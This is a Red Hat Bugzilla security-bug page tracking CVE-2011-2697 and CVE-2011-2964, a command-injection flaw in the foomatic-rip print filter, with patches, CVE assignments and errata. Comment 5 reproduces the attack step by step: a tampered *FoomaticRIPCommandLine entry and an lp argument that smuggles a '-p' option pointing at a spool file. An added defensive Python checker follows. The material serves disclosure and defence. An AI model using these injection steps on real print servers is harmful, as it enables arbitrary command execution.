Bug 721001 (CVE-2011-2697) - CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2011-2697
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 725631 725632 725633 833897
Blocks: 721067
 
Reported: 2011-07-13 14:18 UTC by Jan Lieskovsky
Modified: 2019-09-29 12:45 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-08-01 16:00:55 UTC
Embargoed:


Attachments
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch (8.53 KB, patch)
2011-07-13 14:24 UTC, Jan Lieskovsky
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch (14.05 KB, patch)
2011-07-13 14:25 UTC, Jan Lieskovsky
ppd containing cupsFilter (3.35 KB, application/x-gzip)
2011-07-26 06:47 UTC, Huzaifa S. Sidhpurwala


Links
Red Hat Product Errata RHSA-2011:1109 (priority normal, status SHIPPED_LIVE): Moderate: foomatic security update, last updated 2011-08-01 15:56:19 UTC

Description Jan Lieskovsky 2011-07-13 14:18:58 UTC
It was found that the foomatic-rip universal print filter did not properly sanitize the content of the "files to be printed" command line argument prior to performing the print job. A remote attacker could provide a specially crafted PostScript Printer Description (PPD) file and trick a local user into printing it, which, once performed, could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool.

References:
[1] https://bugzilla.novell.com/show_bug.cgi?id=698451
[2] http://www.openwall.com/lists/oss-security/2011/07/13/3
    (CVE Request)

Proposed patch against the foomatic-rip C-source code:
[3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24

Proposed patch against the foomatic-rip Perl script:
[4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25

Comment 1 Jan Lieskovsky 2011-07-13 14:24:15 UTC
Created attachment 512673
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch

Comment 2 Jan Lieskovsky 2011-07-13 14:25:09 UTC
Created attachment 512674
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch

Comment 3 Jan Lieskovsky 2011-07-13 14:26:29 UTC
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update.

Comment 4 Jan Lieskovsky 2011-07-13 14:28:14 UTC
Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]

Comment 5 Jan Lieskovsky 2011-07-13 14:37:46 UTC
Further detail from Novell bugzilla [1] on how to reproduce the issue
(the scenario would need to be modified a bit, though, to apply to the foomatic-rip versions shipped across Red Hat products):
==============================================================================

How to reproduce with foomatic-rip:

1.
Set up a queue which uses foomatic-rip
i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

# lpadmin -p testy2 -v file:/dev/null \
    -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \
    -E

If you don't have openSUSE 11.4, the Generic-PCL_5c_Printer.ljet4.ppd.gz
is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2.
Get the PPD as normal user:

$ wget http://localhost:631/printers/testy2.ppd
...
2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3.
Modify the PPD as normal user:

Change the *FoomaticRIPCommandLine: entry (up to the *End line)
as one likes, e.g. to this single line (without an *End line):
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4.
Print a dummy job to find out the current job id as normal user:

$ echo Hello | lp -d testy2
request id is testy2-111

5.
Print the malicious job as normal user:

$ lp -d testy -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy-112

6.
Verify that the FoomaticRIPCommandLine was actually executed:

# ls -l /tmp/testy2.out
-rw------- 1 lp lp 57 Jun  7 12:40 /tmp/testy2.out

# cat /tmp/testy2.out
openSUSE 11.4 (x86_64)
VERSION = 11.4
CODENAME = Celadon

==============================================================================

And one more correction regarding point 5:

How to reproduce with foomatic-rip:
...
5.
Print the malicious job as normal user:

$ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy2-112
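
The reproduction above works because foomatic-rip takes whatever file its -p option names as the PPD and executes that file's *FoomaticRIPCommandLine entry, so a spooled job file can stand in for a PPD. As an added example (not code from this bug report or from the foomatic project), the Python below does two defender-side checks: it parses a PPD, including the multi-line form terminated by *End that step 3 mentions, and flags a *FoomaticRIPCommandLine whose pipeline stages invoke a program outside an allowlist of renderers; and it rejects a -p path that does not resolve under an administrator-controlled PPD directory. The allowlist, the trusted directories and the two sample PPD fragments are constructed assumptions, and the path check is one plausible mitigation, not the upstream patch described on the page.

```python
import os
import re
import shlex

# Assumed allowlist of renderer programs a legitimate foomatic PPD invokes;
# this is a constructed example list, not one from foomatic or the bug report.
ALLOWED_COMMANDS = {"gs", "pnmtops", "ijs", "hpijs", "foomatic-rip"}

# Assumed set of directories an administrator controls; a PPD handed to
# foomatic-rip via -p from anywhere else (e.g. the CUPS spool) is rejected.
TRUSTED_PPD_DIRS = ("/etc/cups/ppd", "/usr/share/cups/model")


def parse_ppd_entries(text):
    """Map *Keyword -> value for a PPD, keeping the first occurrence of a key.

    Handles the single-line form  *Key: "value"  and the multi-line form whose
    value runs until a closing double quote and is followed by an *End line.
    """
    entries = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = re.match(r'^\*([A-Za-z0-9_-]+):\s*"(.*)$', lines[i])
        if not m:
            i += 1
            continue
        key, rest = m.group(1), m.group(2)
        parts = []
        while True:  # accumulate lines until the closing double quote
            if rest.endswith('"'):
                parts.append(rest[:-1])
                break
            parts.append(rest)
            i += 1
            if i >= len(lines):
                break
            rest = lines[i]
        if i + 1 < len(lines) and lines[i + 1].strip() == "*End":
            i += 1  # consume the *End terminator of a multi-line value
        entries.setdefault(key, "\n".join(parts))
        i += 1
    return entries


def check_rip_command(entries):
    """Return (ok, reason) after inspecting each stage of *FoomaticRIPCommandLine."""
    cmdline = entries.get("FoomaticRIPCommandLine")
    if cmdline is None:
        return True, "no FoomaticRIPCommandLine entry"
    # Split the pipeline on shell connectors and check each stage's program.
    for stage in re.split(r"\|\||&&|\||;", cmdline):
        stage = stage.strip()
        if not stage:
            continue
        try:
            argv = shlex.split(stage)
        except ValueError:
            return False, "unparsable command line"
        if not argv:
            continue
        if os.path.basename(argv[0]) not in ALLOWED_COMMANDS:
            return False, f"unexpected program {argv[0]!r}"
    return True, "all stages use allow-listed renderers"


def ppd_path_is_trusted(path, trusted_dirs=TRUSTED_PPD_DIRS):
    """True if the resolved PPD path lies under one of the trusted directories."""
    real = os.path.realpath(path)
    for d in trusted_dirs:
        base = os.path.realpath(d)
        if os.path.commonpath([real, base]) == base:
            return True
    return False


# Constructed sample PPD fragments (not the attachment from the bug report).
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE -sDEVICE=ljet4
 -sOutputFile=- -"
*End
'''

TAMPERED_PPD = '''*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"
'''

if __name__ == "__main__":
    for name, ppd in (("benign", BENIGN_PPD), ("tampered", TAMPERED_PPD)):
        print(name, check_rip_command(parse_ppd_entries(ppd)))
    print(ppd_path_is_trusted("/etc/cups/ppd/testy2.ppd"),
          ppd_path_is_trusted("/var/spool/cups/d00112-001"))
```

Run against the two fragments, the benign PPD passes and the tampered one is reported for invoking /bin/cp; the spool path from step 5 fails the directory check while a PPD under /etc/cups/ppd passes. The allowlist approach deliberately judges the program of every pipeline stage rather than scanning for shell metacharacters, because legitimate foomatic command lines routinely contain pipes and && connectors.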

Comment 10 Jan Lieskovsky 2011-07-18 12:38:40 UTC
The CVE identifier CVE-2011-2697 has been assigned to this issue:
http://www.openwall.com/lists/oss-security/2011/07/18/3

Comment 12 Huzaifa S. Sidhpurwala 2011-07-26 06:47:58 UTC
Created attachment 515184
ppd containing cupsFilter

Comment 15 Vincent Danen 2011-07-29 21:51:36 UTC
MITRE has assigned two CVE names here:


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to
the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file.


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to
the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file, a different
vulnerability than CVE-2011-2697.

Comment 16 Huzaifa S. Sidhpurwala 2011-08-01 02:55:24 UTC
Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4, rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora

Comment 17 Huzaifa S. Sidhpurwala 2011-08-01 03:25:16 UTC
Keeping this bug for the perl issue.

Comment 18 errata-xmlrpc 2011-08-01 15:56:24 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html

